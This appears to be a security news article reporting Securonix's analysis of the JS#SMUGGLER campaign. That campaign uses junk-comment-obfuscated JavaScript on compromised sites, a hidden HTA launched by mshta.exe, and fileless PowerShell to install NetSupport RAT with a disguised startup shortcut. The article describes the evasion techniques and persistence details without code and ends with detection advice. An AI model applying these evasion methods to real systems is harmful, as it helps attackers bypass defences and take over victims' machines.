JS#SMUGGLER Malware Evades EDR Using “Junk Code” JavaScript and Fileless PowerShell to Deploy NetSupport RAT
Ddos 
A sophisticated new malware campaign has been uncovered targeting enterprise users through compromised websites, employing a complex multi-stage attack chain designed to bypass modern security defenses. Dubbed “JS#SMUGGLER” by the Securonix Threat Research team, the operation leverages heavily obfuscated JavaScript and “Living-off-the-Land” (LOLBins) binaries to silently install the notorious NetSupport RAT.
The attack is notable for its stealth and adaptability. According to the analysis, “The attack chain unfolds across three distinct stages: (1) an obfuscated JavaScript loader injected into a compromised website, (2) a stealthy HTA (HTML Application) that executes encrypted PowerShell stagers via mshta.exe, and (3) a final PowerShell payload that downloads, extracts, executes, and establishes persistence for a Windows-based remote access Trojan”.
Stage 1: The “Junk Code” Camouflage
The infection begins when a victim visits a compromised website containing a malicious script injection. To evade detection, the attackers use a novel obfuscation technique. “Instead of relying solely on compacted or encrypted code, the attackers flooded the script with massive comment blocks filled with randomly generated words, inserting them between nearly every line of functional JavaScript”.
This flood of “junk text” bloats the file into thousands of lines of noise, helping it slip past automated scanners that might flag more traditional, compact malicious scripts.
Once loaded, the script acts as a smart traffic director. It fingerprints the victim’s device, checking if they are on mobile or desktop .
- Mobile Users: Redirected via a fullscreen iframe to a different malicious URL.
- Desktop Users: Targeted for the next stage of the infection via a dynamically generated script tag.
Crucially, the loader implements a “first-visit” check using the browser’s localStorage. “The loader also implements a subtle first-visit tracking mechanism… to ensure the malicious logic executes only once per user, reducing noise and increasing stealth”.
Stage 2: The Silent HTA Loader
If the victim is on a desktop, the script fetches a malicious HTML Application (HTA) file. This file is executed using mshta.exe, a legitimate Windows utility often abused by attackers to run code outside the browser’s security sandbox.
The HTA is engineered to be invisible. It configures itself with settings like border=”none”, showintaskbar=”no”, and windowstate=”minimize” to ensure it “runs completely hidden from the user” .
Inside this hidden window, the HTA decrypts an embedded PowerShell payload using a multi-layered approach: “AES-256-ECB decoding, Base64 extraction, and GZIP decompression”. This payload is then executed directly in memory, a technique known as “fileless” malware execution.
“This technique is a hallmark of modern fileless malware: it allows attackers to run sophisticated logic entirely in memory, bypassing antivirus engines and EDR tools that rely on scanning files written to disk”.
Stage 3: NetSupport RAT Deployment
The final stage delivers the ultimate payload: NetSupport RAT. While NetSupport Manager is a legitimate remote administration tool, it is frequently repurposed by cybercriminals to gain unauthorized access to victim machines.
“NetSupport RAT enables full attacker control over the victim host, including remote desktop access, file operations, command execution, data theft, and proxy capabilities”.
The installer downloads the RAT components from an attacker-controlled ZIP file and hides them in a benign-looking directory under C:\ProgramData\CommunicationLayer. To ensure the malware survives a reboot, the script creates a deceptive shortcut in the Windows Startup folder named “WindowsUpdate.lnk”.
The JS#SMUGGLER campaign represents a significant evolution in web-based malware delivery. By combining advanced JavaScript obfuscation with fileless execution and legitimate administrative tools, the attackers have created a highly resilient infection chain.
Securonix advises organizations to “stay alert for web-based social engineering techniques” and to deploy Endpoint Detection and Response (EDR) solutions capable of detecting “suspicious script activity, HTA/mshta.exe abuse, fileless PowerShell execution, and anomalous parent-child process chains”.
Donate